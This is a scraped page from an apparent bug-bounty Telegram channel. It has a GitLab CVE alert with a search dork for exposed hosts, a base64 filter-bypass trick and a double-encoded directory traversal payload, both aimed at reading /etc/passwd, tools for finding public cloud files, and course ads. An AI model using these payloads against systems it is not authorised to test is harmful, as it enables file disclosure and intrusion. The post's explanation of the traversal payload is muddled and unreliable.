Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
🔥2
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating 🔥

The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.

Search at Netlas.io:
👉 Link: https://nt.ls/HvsUY
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef

Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
IDOR.pdf
78.5 KB
👍1
Brut Security pinned «Keep Checking Old Posts 🍿»
Is X Bug Bounty Community
Anonymous Poll
38%
Toxic
62%
Great
url/?f=etc/passwd ==> 403
encode etc/passwd as base64

url/?f=L2V0Yy9wYXNzd2Q= ==> 200

#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...

By:@GodfatherOrwa

#bugbountytips #BugBounty
👍10🔥2🤔21
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4
💥2 Days Left for Registration of July Batch: Extreme Web Application Penetration Testing 💥

🚨Classes Starting From- Tuesday 16 July, 4PM INDIAN STANDARD TIME

💯Registration Link- https://wa.me/message/NQLPOBIAEFDBN1

⭕️Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!
Please open Telegram to view this post
VIEW IN TELEGRAM
Find public files in Amazon S3
http://s3digger.com

Find public files in Dropbox 
https://drodigger.com

Find public files in Disk Yandex
https://yadigger.com

Find public files in Google Drive
https://drodigger.com

Find public files in other file sharing sites
https://fidigger.com

Find public files on url shortening sites
https://shortdigger.com
👍42
🚨A directory traversal bug in a private Intigrity program.

💥Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd

Courtesy- Click Here
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍4
Brut Security
🚨A directory traversal bug in a private Intigrity program. 💥Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd Courtesy- Click Here
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
👍4
payloads.txt
5.3 MB
Directory-Traversal-Payloads
👍2😁1
Brut Security pinned «💥2 Days Left for Registration of July Batch: Extreme Web Application Penetration Testing 💥 🚨Classes Starting From- Tuesday 16 July, 4PM INDIAN STANDARD TIME 💯Registration Link- https://wa.me/message/NQLPOBIAEFDBN1 ⭕️Join us for an intensive 2-month course…»